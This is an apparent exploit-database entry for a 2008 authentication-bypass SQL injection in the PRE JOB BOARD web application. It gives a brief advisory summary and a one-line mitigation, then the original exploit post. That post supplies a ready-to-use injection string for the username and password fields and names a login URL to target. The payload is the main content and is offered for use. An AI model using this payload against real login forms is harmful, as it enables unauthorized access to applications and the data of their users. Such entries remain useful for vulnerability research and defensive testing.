SQL Injection Vulnerability

vendor:

PRE JOB BOARD

by:

R3d-D3v!L

7.5

CVSS

HIGH

Auth Bypass

CWE

Product Name: PRE JOB BOARD

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

SQL Injection Vulnerability

A SQL injection vulnerability exists in PRE JOB BOARD. An attacker can supply crafted input to bypass authentication and gain access to the application.

Mitigation:

Input validation should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

[~] ----------------------------Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…------------------------------ 
[~]Tybe: (Auth Bypass) SQL Injection Vulnerability 

[~]Vendor:http://www.preproject.com/preaspjobboard.asp

[~]Software: PRE JOB BOARD

[~]author: R3d-D3v!L 

[~] Date: 21.11.2008 

[~] Home: www.ahacker.biz 

[~] contact: N/A 
[~] ----------------------------------------------------------- 


[~] Exploit: 

username: r0' or ' 1=1-- 
password: r0' or ' 1=1-- 


[~] login for demo: 

http://preproject.com/preaspjobboard//Employee/emp_login.asp


[~]-------------------------------------------------------------------------------- 
[~] Greetz tO: keta & m4n0n & maxmos & 8orn 2 K!LL & hesham_hacker 
[~] 
[~]spechial thanks : dolly & 7am3m & Ø¹Ù…Ø§Ø¯ ,Ø§Ù„Ø²Ù‡ÙŠØ±ÙŠ 
[~] 
[~] EV!L !NS!D3 734M ---> R3d-D3v!L--EXOT!C --poison scorbion 
[~] 
[~] & xp10.biz & ahacker.biz
[~] 
[~]--------------------------------------------------------------------------------



# milw0rm.com [2008-11-19]